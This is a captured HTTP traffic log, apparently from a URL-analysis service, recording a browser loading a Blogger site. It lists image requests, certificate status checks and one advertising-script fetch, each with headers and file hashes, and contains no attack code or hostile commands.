Report-To: {"group":"blogger-tech","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/blogger-tech"}]}
Content-Length: 2026
Date: Mon, 28 Nov 2022 11:29:41 GMT
Expires: Mon, 05 Dec 2022 11:29:41 GMT
Cache-Control: public, max-age=604800
Last-Modified: Mon, 28 Nov 2022 10:50:16 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0


--- Additional Info ---
Magic:  ASCII text
Size:   2026
Md5:    c4e1ed83d89245089b8a1203be20a377
Sha1:   f3940e1215b89300ef97d57a25993f25243b8688
Sha256: afa801a129ff6fc98533118275db8a7d4a38fc91f8ab55ed4c19b864255e68d2
                                        
                                            GET /-Ix-KFahDlto/VcSHPUJ01BI/AAAAAAAAB2g/jaGgnwFTr0s/s72-c/Join%2Bus%2Bfor%2Bthe%2Bsupport%2Byou.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v769"
Expires: Tue, 29 Nov 2022 11:29:41 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Join us for the support you.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:41 GMT
Server: fife
Content-Length: 1238
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   1238
Md5:    f60bd8261a63e1c5b69822381757fa88
Sha1:   5b8cb3b3c7969d37de5fd30fc832b9dc3518b998
Sha256: 7b05e4da246f29ad0ddf4adde275c8daf541874397f3bb5aac94dc123201bf15
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-nIN7sgCblk0/UPsFhnR2hkI/AAAAAAAAIwo/qlkN84k7LOI/s400/mbt-footer.png HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
Content-Disposition: inline;filename="mbt-footer.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: fife
Content-Length: 366
X-XSS-Protection: 0
Date: Mon, 28 Nov 2022 11:29:42 GMT
Expires: Sun, 27 Nov 2022 18:41:50 GMT
Cache-Control: public, max-age=86400, no-transform
ETag: "v4023"
Age: 0


--- Additional Info ---
Magic:  PNG image data, 40 x 62, 8-bit/color RGBA, non-interlaced\012- data
Size:   366
Md5:    59c36ebeb04b7ccb8ea0f54f16aec2f0
Sha1:   07e903c53923d9c2a522fbbcb3f3f2d46371ed41
Sha256: 16ee6c882daf36280e16710b7005fe309f6d50c0bec78b9680fba56c594ac2ab
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-Rhp6ySYpyu4/Vp9uyAX-PgI/AAAAAAAACFM/9CSuvRTZKHc/s72-c/add%2Brating%2Bstar%2Bin%2Bwidget%2Bpopular%2Bpost.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v854"
Expires: Tue, 29 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="add rating star in widget popular post.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:42 GMT
Server: fife
Content-Length: 2645
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2645
Md5:    7b779bfab5cff0c3bb2b7153df06f3c1
Sha1:   04862ff46067cb1aff6ceed5b142fb2c939e3084
Sha256: a278bb8404242f521a0e272b4abe6a489121470e7f5b5c2e33f5e55b2f7f99c3
                                        
                                            GET /show.js HTTP/1.1 
Host: ads2.hsoub.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             63.34.141.28
HTTP/1.1 200 OK
Content-Type: application/javascript
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Content-Length: 5204
Connection: keep-alive
Server: nginx/1.6.2
Last-Modified: Thu, 15 Aug 2019 00:46:54 GMT
ETag: "5d54ab7e-1454"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (5204), with no line terminators
Size:   5204
Md5:    6976f7aa9f4ca9ac36ad64f94eeb5c7a
Sha1:   961117c26132d631d6c6b7d2fb96a6d0d8d1212d
Sha256: 8c0891838cf8f3d0d9fa5262059a90823a58e89d03fc86716be1d16fd36af9e4
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-oWkzG6N8jmQ/Vd3sRDnlfpI/AAAAAAAAB4I/CADpmD0qSr4RZSEGbcM7Dh-AB5KWZHxxQCKgB/s1600/55f5984151291.gif HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/gif
                                            
access-control-expose-headers: Content-Length
etag: "v782"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="55f5984151291.gif"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 692045
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 300 x 250\012- data
Size:   692045
Md5:    ad5bc15f31cfdd67a295e09e8e6248c4
Sha1:   656989d8be8af4a6ebaa8ec02d18f55065f767ea
Sha256: e5eb638331a412f0089aac4850306aa3a8b730342451c013b02e65d985cfd2e2
                                        
                                            GET /-ncoKl4YSkHQ/VWGvQTrH1VI/AAAAAAAABmg/684Ex6ebkEA/s72-c/create-custom-contact-form-mudwnp.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v669"
Expires: Tue, 29 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="create-custom-contact-form-mudwnp.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:42 GMT
Server: fife
Content-Length: 3036
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3036
Md5:    630d3a1664cc080de9d5ed5feeef39fd
Sha1:   6e4c81483ff06b56b93a19941147ec22adddd9a0
Sha256: 3e7204a6389764a54ae03689358d12778df35f95beeb7d8b490b73087df436ac
                                        
                                            GET /-WJPCLfDgUK4/U9h7b6akSjI/AAAAAAAAAZA/VAMMRN357u0/s1600/iu6POQ.png HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v191"
Expires: Tue, 29 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="iu6POQ.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:42 GMT
Server: fife
Content-Length: 1587
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 102 x 102, 8-bit colormap, non-interlaced\012- data
Size:   1587
Md5:    ab9b8e82152d5770f52c58efda1e9d7f
Sha1:   4fb0202acde4a22f4f3a2033db288976c17a04d4
Sha256: d8d9ed81efe2deaaabfc057713cb09612db413c6c1d0bd90c94736024bdcc478
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-WADCEnkdg-s/Vvy8gdcvcVI/AAAAAAAACHU/SuW5GcTG_L0ST6kU15MFjTvo-hUpOB6zQ/s72-c/add-widget-recent-post-by-label-blog-new-style.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v876"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="add-widget-recent-post-by-label-blog-new-style.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 2586
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2586
Md5:    f2064aa8d02492194a1371b5d38125b3
Sha1:   8f18b27fc1832403b71fb90e03d4611f1f859b38
Sha256: 5f4df32c7e56edd5e3d7f91011617fda4a7a145eb7e44533a0cc6d15bc9bdbf3
                                        
                                            GET /-5WKpSgINs9w/V4xDpNPZ4gI/AAAAAAAACLQ/9_zMjfYQmsg2oXuDJ7eMJcXnaQ7DeveHACLcB/s72-c/featured-posts-slider-widget-blogger.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8b7"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="featured-posts-slider-widget-blogger.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 2028
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2028
Md5:    0da43729f27acee16262c66c5e522fb6
Sha1:   cc128d68e491dd2c245d9866233f5ea1ea3389e6
Sha256: a383b05bdc282f1b15d47c77e9427e397cd6f78d9af2c547e2ee4e7d679571ac
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Date: Mon, 28 Nov 2022 11:29:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /-7UCZ3Hdza5A/VzK6x7t8NpI/AAAAAAAACJg/Gc9G5JCLFYEEep6MOGdjHf0nm-kwY7cJACLcB/s72-c/easy.mag.blogger.template.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v899"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="easy.mag.blogger.template.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 2760
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2760
Md5:    83da08fd996e01df3b1e1c182b8f42fe
Sha1:   34a60aac6b0de78feed630003e953977e77e8292
Sha256: 3db468d60e5a14c64a1a4ca48b2bc9bc41cdec33a32db28ddc43945a1ae3c7c7
                                        
                                            GET /-TUHW6weJdII/V3euSQGBdBI/AAAAAAAACKk/YuWGP63yx9ocnBGLedNhQc_RyKmNa7_kgCLcB/s72-c/aegygeek-responsive-blogger-template.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8aa"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="aegygeek-responsive-blogger-template.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 3564
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   3565
Md5:    f9019d7a7925010c5589d31c2f9a9e4a
Sha1:   7afc8f24dd723eee1df28cd61e9bbc5445d36aeb
Sha256: d3796b4cf2ec6c4a27523a7706e21dc2bc124d6bb61ad6e003cce85d7f99ea20
                                        
                                            GET /-Z-SvTLiK4GY/V80OcVDPxrI/AAAAAAAACME/qGSB_hBFvNYccbH_lnfFi0biN0IJfXGxACLcB/s1600/fix.ajax.page.navigation.problem.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8c4"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="fix.ajax.page.navigation.problem.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 57868
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], progressive, precision 8, 622x222, components 3\012- data
Size:   57868
Md5:    9ea172f6134313164c18bb0ce61e1f85
Sha1:   234ab46a0b921bf68af2a9a09013469e7faaf361
Sha256: 9a8bba46bd95a3759b2d408faddfdfe1065d37199d187893b5733a1cfb5abe8a
                                        
                                            GET /-5WKpSgINs9w/V4xDpNPZ4gI/AAAAAAAACLQ/9_zMjfYQmsg2oXuDJ7eMJcXnaQ7DeveHACLcB/s1600/featured-posts-slider-widget-blogger.jpg HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8b7"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="featured-posts-slider-widget-blogger.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 70590
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=4, orientation=upper-left, software=Google], progressive, precision 8, 622x222, components 3\012- data
Size:   70590
Md5:    7da20f978b3e271227d6eea48c1f2076
Sha1:   a1ff52f1f9c6a7853382c2b4b342e5d4ee2e2d2c
Sha256: 6c4ac422379cc7b78648be50a540e6f61b2ebdd190e468db06a06ba54e50946f
                                        
                                            GET /-A_Q3EmPCy5k/T-bV8bKdJHI/AAAAAAAABcw/jQZFaMUpJmQ/s1600/large_top.png HTTP/1.1 
Host: lh5.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
content-disposition: inline;filename="large_top.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
server: fife
content-length: 1422
x-xss-protection: 0
date: Mon, 28 Nov 2022 11:29:42 GMT
expires: Sun, 20 Nov 2022 15:08:03 GMT
cache-control: public, max-age=86400, no-transform
etag: "v5cc"
age: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 990 x 25, 8-bit/color RGBA, non-interlaced\012- data
Size:   1422
Md5:    08385724dfdc2c7df0c20cab3908d4d4
Sha1:   ddb55c4b6270cd1e138c3cfd10af670175b08b65
Sha256: f227e148f2029766299b62d2ad47a5d5de56a28dea75e2e336739860452408c3
                                        
                                            GET /-ErLhf0FryQA/V_uitwolsYI/AAAAAAAACMk/BE1XMVAivVoEqpoBrWr1QkxoMlhe1-nlQCLcB/s72-c/food-blog-premium-version.jpg HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                        
                                             142.250.74.161
HTTP/2 200 OK
content-type: image/jpeg
                                            
access-control-expose-headers: Content-Length
etag: "v8ca"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="food-blog-premium-version.jpg"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 3794
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3794
Md5:    ecad09bb30b302bc7d3413cb6f249d85
Sha1:   7ac6d452bdb9e2decc71ef2edda986d3db5ecb89
Sha256: 8498ff70a38f5909365df122c1b4c5eb18a0e726b87926432c30895a720e1b8d
                                        
                                            GET /-snaeA9pM9cE/T-bWA9sPJ8I/AAAAAAAABdo/jJewxgAHKfs/s640/post_footer_middle.png HTTP/1.1 
Host: lh5.googleusercontent.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mudwnp.blogspot.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                        
                                             142.250.74.33
HTTP/2 200 OK
content-type: image/png
                                            
access-control-expose-headers: Content-Length
etag: "v5da"
expires: Tue, 29 Nov 2022 11:29:42 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="post_footer_middle.png"
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Mon, 28 Nov 2022 11:29:42 GMT
server: fife
content-length: 6258
x-xss-protection: 0
